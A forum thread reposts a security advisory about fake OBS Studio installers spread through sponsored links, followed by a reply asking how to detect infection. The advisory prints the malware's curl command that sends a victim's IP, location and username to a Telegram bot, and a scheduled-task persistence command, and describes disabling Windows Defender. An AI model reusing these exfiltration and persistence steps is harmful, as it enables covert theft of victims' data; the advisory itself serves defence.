Jump to content

OBS Security Warning


Lipfert
 Share

Recommended Posts

From Blackpoint Cyber Security (partner):

Blackpoint Cyber is actively monitoring malicious Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. The use of sponsored links to distribute malware is another iteration in the continual attempts to compromise devices. The security community is discussing the most recent distribution of fake OBS software as a means of infecting victims, and we wanted to share some details that we have not seen published yet. 

 

The initial stage of the installation will use cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this is acquired, the information is sent to a telegrams chat using a hard coded API account. 

 

curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage"  

 

From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malware Bytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml 

 

How to Mitigate: 

  • Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites. 
  • Only download software from legitimate websites and sources. 
  • If a paid software is being offered for free or at a discounted price, there is a higher chance it’s malicious. 

Important: Blackpoint’s SOC has seen indicators of compromise in our partners’ environments.  

 

The Blackpoint SOC will continue to actively monitor for any indicators of compromise associated with this vulnerability. We are confident that our experienced MDR analysts and technology will continue to protect your business and clients. 

 

Sincerely, 

Blackpoint Cyber 

Link to comment
Share on other sites

 

2 hours ago, Lipfert said:

The initial stage of the installation will use cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this is acquired, the information is sent to a telegrams chat using a hard coded API account. 

 

curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage"  

 

From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malware Bytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml 

How can we check to see if this is taking place?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
 Share

×
×
  • Create New...